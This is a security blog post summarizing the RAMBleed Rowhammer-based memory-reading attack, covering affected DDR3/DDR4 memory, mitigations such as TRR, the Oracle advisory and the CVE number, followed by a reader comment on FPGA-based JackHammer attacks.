RAMBleed vulnerability

A team of researchers representing several universities has disclosed the details a new type of side-channel attack: Researchers show with RAMBleed that it’s possible to use Rowhammer-style side-channel attacks to read protected memory. RAMBleed takes Rowhammer in a new direction. Rather than using bit flips to alter sensitive data, the new technique exploits the hardware bug to extract sensitive data stored in memory regions that are off-limits to attackers. RAMBleed technique exploits the ever-shrinking dimensions of DRAM chips.

 

2019-06-12-2

RAMBleed attacks work against devices that use DDR3 and DDR4 memory modules. It does now work older DDR1 and DDR2 seen on old PCss and many embedded systems.RAMBleed side-channel attack works even when DRAM is protected by error-correcting code because unlike Rowhammer, RAMBleed does not require persistent bit flips, and is thus effective against ECC memory commonly used by server computers.

The attack is possible now on some vulnerable Linux systems: Researchers found a way to abuse the Linux buddy allocator to allocate a large block of consecutive physical addresses memory on  which they could orchestrate their attack. Researchers designed a new mechanism, which they called “Frame Feng Shui,” for placing victim program pages at a desired location on the physical memory. Researchers developed a new method of arranging data in memory and hammering memory rows to infer what data is located in nearby memory cells, rather than just produce a bit flip from 0 to 1, and vice versa.

The researchers were able to steal 2048-bit RSA crypto key (in this case SSH key but this could have been any crypto key). RAMBleed can potentially read any data stored in memory.

Oracle has released an advisory for RAMBleed and other vendors will likely do the same. Users can mitigate their risk by upgrading their memory to DDR4 with targeted row refresh (TRR) enabled. While Rowhammer-induced bit flips have been demonstrated on TRR, it is harder to accomplish in practice. This does not completely block Rowhammer attacks, but it does make them much more difficult – hopefully difficult enough not to be an issue.  Oracle does not believe that additional software patches will need to be produced to address the RAMBleed issues.

Is there a CVE number? Yes, see CVE-2019-0174.

Sources:

https://arstechnica.com/information-technology/2019/06/researchers-use-rowhammer-bitflips-to-steal-2048-bit-crypto-key/

https://www.zdnet.com/article/rambleed-rowhammer-attack-can-now-steal-data-not-just-alter-it/

https://rambleed.com/

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0174

https://www.securityweek.com/new-rambleed-attack-allows-access-sensitive-data-memory

https://blogs.oracle.com/security/rambleed

https://www.zdnet.com/article/rambleed-rowhammer-attack-can-now-steal-data-not-just-alter-it/

3 Comments

  1. Tomi Engdahl says:

    FPGA cards can be abused for faster and more reliable Rowhammer
    attacks
    https://www.zdnet.com/article/fpga-cards-can-be-abused-for-faster-and-more-reliable-rowhammer-attacks/
    Seeing that FPGA-CPU architectures are becoming more common, a team of
    researchers from the Worcester Polytechnic Institute in the US, the
    University of Lubeck in Germany, and Intel, have looked into how
    Rowhammer attacks impact this new cloud setup.. Furthermore, the
    academic team also found that a JackHammer attack is much more
    difficult to detect because of the FPGA’s direct access to system
    resources leaves no traces on the CPU of the FPGA’s memory access
    operations. Since most anti-Rowhammer detection systems are configured
    at the CPU level, this opens a new blindspot in CPU and cloud
    security.

    Reply

Leave a Comment

Your email address will not be published. Required fields are marked *

*

*